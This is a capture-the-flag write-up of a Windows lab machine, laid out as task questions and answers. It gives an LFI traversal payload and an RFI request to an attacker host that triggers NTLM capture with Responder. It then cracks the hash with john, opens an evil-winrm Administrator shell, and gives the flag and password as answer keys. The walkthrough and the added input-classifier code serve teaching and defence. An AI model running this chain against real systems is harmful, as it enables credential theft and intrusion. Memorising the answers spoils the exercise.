Related material
Q:How many TCP ports are open on the machine?
┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p1-65535 10.129.42.95
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 16:12 CST
Nmap scan report for 10.129.42.95
Host is up (0.39s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open wsman
7680/tcp open pando-pub
Nmap done: 1 IP address (1 host up) scanned in 790.35 seconds
Many commands can scan ports; it doesn't have to be this one. Dropping the extra scans (such as -sC) saves a lot of time.
A:3
Task 2
Q:When visiting the web service using the IP address, what is the domain that we are being redirected to?
Just open it in a browser and see where it redirects.
A:unika.htb
Task 3
Q:Which scripting language is being used on the server to generate webpages?
Capture the request and look at the response; the headers return the version information.
You can also add an entry to the hosts file so that the redirect target still resolves to the IP address.
A:php
Task 4
Q:What is the name of the URL parameter which is used to load different language versions of the webpage?
Click any link and look at the parameter that gets submitted.
A:page
Task 5
Q:Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
The question asks which one is a local file inclusion.
A:../../../../../../../../windows/system32/drivers/etc/hosts
Task 6
Q:Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
The question asks which one is a remote file inclusion.
A://10.10.14.6/somefile
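As an added example (not part of the original writeup), the Python below shows the server-side check that separates the four candidate values from Tasks 5 and 6: a scheme or host prefix is treated as a remote include, traversal or an absolute path as a local include, and only allowlisted language pages resolve to a file inside the web root. The allowlist and the web root path are assumptions.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed allowlist: the language pages the site is meant to serve (assumption).
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}
WEB_ROOT = "/var/www/html"  # assumed document root


def classify_page_param(value: str) -> str:
    """Label a raw `page` value as 'allowed', 'rfi', 'lfi' or 'rejected'.

    A scheme or host prefix would make PHP's include() fetch a remote resource
    (RFI); '..' segments, a leading '/' or a drive letter reach outside the web
    root on the local disk (LFI).
    """
    v = unquote(value).replace("\\", "/")  # decode %2e%2e etc., treat \ like /
    u = urlsplit(v)
    if u.netloc or len(u.scheme) > 1:      # http://host/x, //host/share, \\host\share
        return "rfi"
    if ".." in v.split("/") or v.startswith("/") or re.match(r"^[A-Za-z]:", v):
        return "lfi"
    return "allowed" if v in ALLOWED_PAGES else "rejected"


def resolve_page(value: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Hardened include: allowlist first, then prove the resolved path stays in root."""
    if classify_page_param(value) != "allowed":
        return None
    candidate = posixpath.normpath(posixpath.join(web_root, unquote(value)))
    if posixpath.commonpath([web_root, candidate]) != web_root:
        return None  # belt and braces: refuse anything that escaped the root
    return candidate


if __name__ == "__main__":
    for sample in ("french.html", "//10.10.14.6/somefile",
                   "../../../../../../../../windows/system32/drivers/etc/hosts",
                   "minikatz.exe"):
        print(f"{sample!r:62} -> {classify_page_param(sample):8} {resolve_page(sample)}")
```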
Task 7
Q:What does NTLM stand for?
NTLM is a suite of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate clients to resources in an Active Directory domain.
A:New Technology LAN Manager
Task 8
Q:Which flag do we use in the Responder utility to specify the network interface?
The Responder tool.
A:-I
Task 9
Q:There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?
It is used to crack hashes; we'll have to try it out together with Responder and see.
A:john the ripper
Task 10
Q:What is the password for the administrator user?
First start Responder, listening on the local tun0 interface.
┌──(root💀kali)-[~]
└─# responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.0.7.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.86]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-BEA716J9KXD]
Responder Domain Name [HALN.LOCAL]
Responder DCE-RPC Port [47831]
[+] Listening for events...
Visit unika.htb/?page=//10.10.14.6/somefile
so that the server tries to include a file from our machine; it connects back to us and the hash is captured.
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.42.95
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:c0c8045502c4f5c... (rest of hash truncated)
[*] Skipping previously captured hash for RESPONDER\Administrator
Then create a new file, save the hash from line 7 of the output (the NTLMv2-SSP Hash line) into it, and crack it with john. This takes quite a long time.
┌──(root💀kali)-[~/桌面]
└─# john 1
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
Damn, it ran for two hours with the default modes (single, password.lst, incremental) and still hadn't cracked it.
A:badminton
Task 11
Q:We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
This uses WinRM (wsman) remote management on port 5985.
A:5985
Flag
Install the evil-winrm tool.
┌──(root💀kali)-[~]
└─# gem install evil-winrm
Connect using the cracked password.
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.129.42.95 -u Administrator -p badminton
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Read the flag.
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../../mike
*Evil-WinRM* PS C:\Users\mike> dir
Directory: C:\Users\mike
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2022 4:51 AM Desktop
*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> dir
Directory: C:\Users\mike\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2022 4:50 AM 32 flag.txt
*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
flag:ea81b7afddd03efaa0945333ed147fac